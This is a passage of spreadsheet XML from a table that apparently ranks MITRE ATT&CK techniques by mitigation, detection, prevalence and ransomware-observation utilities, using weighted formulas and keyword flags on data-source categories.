        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ609" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>157.55706600000002</v>
      </c>
      <c r="AR609" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS609" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT609" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU60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10" spans="1:47" ht="68">
      <c r="A610" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B610" s="37">
        <f t="shared" si="9"/>
        <v>531.19070714285715</v>
      </c>
      <c r="C610" s="37" t="s">
        <v>1979</v>
      </c>
      <c r="D610" s="50" t="s">
        <v>1971</v>
      </c>
      <c r="E610" s="37" t="s">
        <v>1980</v>
      </c>
      <c r="F610" s="37">
        <v>1</v>
      </c>
      <c r="G610" s="37">
        <v>1</v>
      </c>
      <c r="H610" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I610" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J610" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K610" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L610" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M610" s="37">
        <v>0</v>
      </c>
      <c r="N610" s="56">
        <v>1</v>
      </c>
      <c r="O610" s="56">
        <v>0</v>
      </c>
      <c r="P610" s="56">
        <v>0</v>
      </c>
      <c r="Q610" s="56">
        <v>0</v>
      </c>
      <c r="R610" s="57" t="s">
        <v>1033</v>
      </c>
      <c r="S610" s="57">
        <v>9</v>
      </c>
      <c r="T610" s="57" t="s">
        <v>1981</v>
      </c>
      <c r="U610" s="57">
        <v>3</v>
      </c>
      <c r="V610" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.11904771428571428</v>
      </c>
      <c r="W610" s="37">
        <v>12</v>
      </c>
      <c r="X610" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Y610" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Z610" s="37">
        <v>1</v>
      </c>
      <c r="AA610" s="37">
        <v>0.01</v>
      </c>
      <c r="AB610" s="37">
        <v>0.01</v>
      </c>
      <c r="AC610" s="37"/>
      <c r="AD610" s="50" t="s">
        <v>1982</v>
      </c>
      <c r="AE610" s="37" t="str" cm="1">
        <f t="array" ref="AE610">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD610)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF610" s="37">
        <v>606</v>
      </c>
      <c r="AG610" s="37" t="str" cm="1">
        <f t="array" ref="AG610">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD610)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH610" s="37">
        <v>606</v>
      </c>
      <c r="AI610" s="37" t="str" cm="1">
        <f t="array" ref="AI610">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD610)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ610" s="37">
        <v>606</v>
      </c>
      <c r="AK610" s="37" t="str" cm="1">
        <f t="array" ref="AK610">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD610)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL610" s="37">
        <v>606</v>
      </c>
      <c r="AM610" s="37" t="str" cm="1">
        <f t="array" ref="AM610">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD610)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN610" s="37">
        <v>0</v>
      </c>
      <c r="AO610" s="37">
        <v>0</v>
      </c>
      <c r="AP610" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ610" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>177.06356904761904</v>
      </c>
      <c r="AR610" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS610" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT610" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU61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11" spans="1:47" ht="17">
      <c r="A611" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B611" s="37">
        <f t="shared" si="9"/>
        <v>133.01666666666668</v>
      </c>
      <c r="C611" s="37" t="s">
        <v>1983</v>
      </c>
      <c r="D611" s="50" t="s">
        <v>1984</v>
      </c>
      <c r="E611" s="37"/>
      <c r="F611" s="37">
        <v>0</v>
      </c>
      <c r="G611" s="37">
        <v>1</v>
      </c>
      <c r="H611" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I611" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J611" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K611" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L611" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M611" s="37">
        <v>0</v>
      </c>
      <c r="N611" s="56">
        <v>0</v>
      </c>
      <c r="O611" s="56">
        <v>1</v>
      </c>
      <c r="P611" s="56">
        <v>0</v>
      </c>
      <c r="Q611" s="56">
        <v>0</v>
      </c>
      <c r="R611" s="57"/>
      <c r="S611" s="57">
        <v>0</v>
      </c>
      <c r="T611" s="57"/>
      <c r="U611" s="57">
        <v>0</v>
      </c>
      <c r="V611" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W611" s="37">
        <v>0</v>
      </c>
      <c r="X611" s="37">
        <v>0</v>
      </c>
      <c r="Y611" s="37">
        <v>0</v>
      </c>
      <c r="Z611" s="37">
        <v>1</v>
      </c>
      <c r="AA611" s="37">
        <v>0.01</v>
      </c>
      <c r="AB611" s="37">
        <v>0.01</v>
      </c>
      <c r="AC611" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD611" s="50" t="s">
        <v>1808</v>
      </c>
      <c r="AE611" s="37" t="str" cm="1">
        <f t="array" ref="AE611">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD611)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF611" s="37">
        <v>607</v>
      </c>
      <c r="AG611" s="37" t="str" cm="1">
        <f t="array" ref="AG611">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD611)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH611" s="37">
        <v>607</v>
      </c>
      <c r="AI611" s="37" t="str" cm="1">
        <f t="array" ref="AI611">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD611)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ611" s="37">
        <v>607</v>
      </c>
      <c r="AK611" s="37" t="str" cm="1">
        <f t="array" ref="AK611">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD611)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL611" s="37">
        <v>607</v>
      </c>
      <c r="AM611" s="37" t="str" cm="1">
        <f t="array" ref="AM611">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD611)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN611" s="37">
        <v>0</v>
      </c>
      <c r="AO611" s="37">
        <v>0</v>
      </c>
      <c r="AP611" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ611" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>44.338888888888896</v>
      </c>
      <c r="AR611" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS611" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT611" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU61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12" spans="1:47" ht="17">
      <c r="A612" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B612" s="37">
        <f t="shared" si="9"/>
        <v>121.65</v>
      </c>
      <c r="C612" s="37" t="s">
        <v>1985</v>
      </c>
      <c r="D612" s="50" t="s">
        <v>1984</v>
      </c>
      <c r="E612" s="37" t="s">
        <v>1986</v>
      </c>
      <c r="F612" s="37">
        <v>0</v>
      </c>
      <c r="G612" s="37">
        <v>1</v>
      </c>
      <c r="H612" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I612" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J612" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K612" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L612" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M612" s="37">
        <v>0</v>
      </c>
      <c r="N612" s="56">
        <v>0</v>
      </c>
      <c r="O612" s="56">
        <v>0</v>
      </c>
      <c r="P612" s="56">
        <v>0</v>
      </c>
      <c r="Q612" s="56">
        <v>0</v>
      </c>
      <c r="R612" s="57"/>
      <c r="S612" s="57">
        <v>0</v>
      </c>
      <c r="T612" s="57"/>
      <c r="U612" s="57">
        <v>0</v>
      </c>
      <c r="V612" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W612" s="37">
        <v>0</v>
      </c>
      <c r="X612" s="37">
        <v>0</v>
      </c>
      <c r="Y612" s="37">
        <v>0</v>
      </c>
      <c r="Z612" s="37">
        <v>0</v>
      </c>
      <c r="AA612" s="37">
        <v>0</v>
      </c>
      <c r="AB612" s="37">
        <v>0</v>
      </c>
      <c r="AC612" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD612" s="50" t="s">
        <v>1808</v>
      </c>
      <c r="AE612" s="37" t="str" cm="1">
        <f t="array" ref="AE612">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD612)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF612" s="37">
        <v>608</v>
      </c>
      <c r="AG612" s="37" t="str" cm="1">
        <f t="array" ref="AG612">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD612)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH612" s="37">
        <v>608</v>
      </c>
      <c r="AI612" s="37" t="str" cm="1">
        <f t="array" ref="AI612">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD612)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ612" s="37">
        <v>608</v>
      </c>
      <c r="AK612" s="37" t="str" cm="1">
        <f t="array" ref="AK612">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD612)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL612" s="37">
        <v>608</v>
      </c>
      <c r="AM612" s="37" t="str" cm="1">
        <f t="array" ref="AM612">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD612)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN612" s="37">
        <v>0</v>
      </c>
      <c r="AO612" s="37">
        <v>0</v>
      </c>
      <c r="AP612" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ612" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>40.550000000000004</v>
      </c>
      <c r="AR612" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS612" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT612" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU61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13" spans="1:47" ht="17">
      <c r="A613" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B613" s="37">
        <f t="shared" si="9"/>
        <v>121.85000000000001</v>
      </c>
      <c r="C613" s="37" t="s">
        <v>1987</v>
      </c>
      <c r="D613" s="50" t="s">
        <v>1984</v>
      </c>
      <c r="E613" s="37" t="s">
        <v>1988</v>
      </c>
      <c r="F613" s="37">
        <v>0</v>
      </c>
      <c r="G613" s="37">
        <v>1</v>
      </c>
      <c r="H613" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I613" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J613" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K613" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L613" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M613" s="37">
        <v>0</v>
      </c>
      <c r="N613" s="56">
        <v>0</v>
      </c>
      <c r="O613" s="56">
        <v>0</v>
      </c>
      <c r="P613" s="56">
        <v>0</v>
      </c>
      <c r="Q613" s="56">
        <v>0</v>
      </c>
      <c r="R613" s="57"/>
      <c r="S613" s="57">
        <v>0</v>
      </c>
      <c r="T613" s="57"/>
      <c r="U613" s="57">
        <v>0</v>
      </c>
      <c r="V613" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W613" s="37">
        <v>0</v>
      </c>
      <c r="X613" s="37">
        <v>0</v>
      </c>
      <c r="Y613" s="37">
        <v>0</v>
      </c>
      <c r="Z613" s="37">
        <v>0</v>
      </c>
      <c r="AA613" s="37">
        <v>0</v>
      </c>
      <c r="AB613" s="37">
        <v>0</v>
      </c>
      <c r="AC613" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD613" s="50" t="s">
        <v>1808</v>
      </c>
      <c r="AE613" s="37" t="str" cm="1">
        <f t="array" ref="AE613">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD613)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF613" s="37">
        <v>609</v>
      </c>
      <c r="AG613" s="37" t="str" cm="1">
        <f t="array" ref="AG613">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD613)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH613" s="37">
        <v>609</v>
      </c>
      <c r="AI613" s="37" t="str" cm="1">
        <f t="array" ref="AI613">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD613)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ613" s="37">
        <v>609</v>
      </c>
      <c r="AK613" s="37" t="str" cm="1">
        <f t="array" ref="AK613">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD613)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL613" s="37">
        <v>609</v>
      </c>
      <c r="AM613" s="37" t="str" cm="1">
        <f t="array" ref="AM613">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD613)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN613" s="37">
        <v>0</v>
      </c>
      <c r="AO613" s="37">
        <v>0</v>
      </c>
      <c r="AP613" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ613" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>40.616666666666667</v>
      </c>
      <c r="AR613" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS613" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT613" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU61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14" spans="1:47" ht="17">
      <c r="A614" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B614" s="37">
        <f t="shared" si="9"/>
        <v>122.05000000000001</v>
      </c>
      <c r="C614" s="37" t="s">
        <v>1989</v>
      </c>
      <c r="D614" s="50" t="s">
        <v>1984</v>
      </c>
      <c r="E614" s="37" t="s">
        <v>1990</v>
      </c>
      <c r="F614" s="37">
        <v>0</v>
      </c>
      <c r="G614" s="37">
        <v>1</v>
      </c>
      <c r="H614" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I614" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J614" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K614" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L614" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M614" s="37">
        <v>0</v>
      </c>
      <c r="N614" s="56">
        <v>0</v>
      </c>
      <c r="O614" s="56">
        <v>0</v>
      </c>
      <c r="P614" s="56">
        <v>0</v>
      </c>
      <c r="Q614" s="56">
        <v>0</v>
      </c>
      <c r="R614" s="57"/>
      <c r="S614" s="57">
        <v>0</v>
      </c>
      <c r="T614" s="57"/>
      <c r="U614" s="57">
        <v>0</v>
      </c>
      <c r="V614" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W614" s="37">
        <v>0</v>
      </c>
      <c r="X614" s="37">
        <v>0</v>
      </c>
      <c r="Y614" s="37">
        <v>0</v>
      </c>
      <c r="Z614" s="37">
        <v>0</v>
      </c>
      <c r="AA614" s="37">
        <v>0</v>
      </c>
      <c r="AB614" s="37">
        <v>0</v>
      </c>
      <c r="AC614" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD614" s="50" t="s">
        <v>1808</v>
      </c>
      <c r="AE614" s="37" t="str" cm="1">
        <f t="array" ref="AE614">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD614)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF614" s="37">
        <v>610</v>
      </c>
      <c r="AG614" s="37" t="str" cm="1">
        <f t="array" ref="AG614">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD614)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH614" s="37">
        <v>610</v>
      </c>
      <c r="AI614" s="37" t="str" cm="1">
        <f t="array" ref="AI614">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD614)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ614" s="37">
        <v>610</v>
      </c>
      <c r="AK614" s="37" t="str" cm="1">
        <f t="array" ref="AK614">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD614)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL614" s="37">
        <v>610</v>
      </c>
      <c r="AM614" s="37" t="str" cm="1">
        <f t="array" ref="AM614">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD614)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN614" s="37">
        <v>0</v>
      </c>
      <c r="AO614" s="37">
        <v>0</v>
      </c>
      <c r="AP614" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ614" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>40.683333333333337</v>
      </c>
      <c r="AR614" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS614" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT614" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU61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15" spans="1:47" ht="17">
      <c r="A615" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B615" s="37">
        <f t="shared" si="9"/>
        <v>122.25</v>
      </c>
      <c r="C615" s="37" t="s">
        <v>1991</v>
      </c>
      <c r="D615" s="50" t="s">
        <v>1984</v>
      </c>
      <c r="E615" s="37" t="s">
        <v>1992</v>
      </c>
      <c r="F615" s="37">
